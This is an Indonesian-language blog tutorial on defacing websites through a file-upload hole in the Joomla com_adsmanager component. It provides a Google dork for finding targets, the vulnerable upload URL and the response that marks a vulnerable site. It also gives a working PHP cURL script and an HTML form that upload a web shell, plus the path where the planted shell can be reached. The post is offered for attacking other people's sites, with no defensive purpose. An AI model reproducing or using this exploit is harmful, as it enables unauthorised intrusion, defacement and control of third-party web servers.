Tutorial Deface Dengan Com_Adsmanager

Author : UnknownTidak ada komentar

Hello ketemu lagi sama Malaikat
hahaha, Baru sempet posting lagi.
Kali ini Malaikat akan Share Tutorial yang lagi booming dikalangan para defacer/pepeser/colizer :v , yaitu Deface Dengan Com_Adsmanager menggunakan XAMPP + Bonus CSRF Upload nya juga

Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org 
(kembangin lagi bro, biar banyak dpt web yg verawan and vuln)


- Masukan Dork di google, dan lalu pilih 1 web

Exploit: /index.php?option=com_adsmanager&task=upload&tmpl=component

- pastekan Exploit diatas ke web target yang baru sobat pilih..
contoh: www.target.co.li//index.php?option=com_adsmanager&task=upload&tmpl=component

Tanda vuln :{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_5"}
(atau kurang lebih seperti di gambar)





Save source code php dibawah:

<?php

$url = "target/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
$post = array
(
"file" => "@shell.jpg",
"name" => "shell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;


?>

target dan shell ganti dgn url web target sobat, dan nama shell milik sobat.
lalu save dgn ekstensi php, di folder /XAMPP/PHP/ yang sudah terinstall di laptop kalian masing2.
lalu copy juga file shell sobat di folder /XAMPP/PHP/.

- Lalu jika sudah di save, aktifkan apache pada XAMPP
- lalu buka CMD dan ketikan.

cd C:/xampp/php
php namasourcecodeanda.php

- Jika muncul akan keluar nama shell sobat
(kurang lebihnya seperti digambar)




- Acces Shell: target.co.li/tmp/plupload/namashellsobat.php




Jika sudah masuk ke shell sobat, seterah deh mau diapain

#Script CSRF Upload :

<form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>


*save dengan ekstensi .html (contoh.html)
*klik ~> pilih shell sobat ~> upload
*letak shell juga sama seperti contoh diatas 

Okeh Sekian tutorial artikel yang saya bahas kali ini. 
sumber: tkjcyberart.blogspot.co.id

Artikel Terkait

Posted On : Rabu, 20 Juli 2016Time : 01.04
SHARE TO :
| | Template Created By : Binkbenks | CopyRigt By : My Blog | |
close
Banner iklan disini
> [Tutup]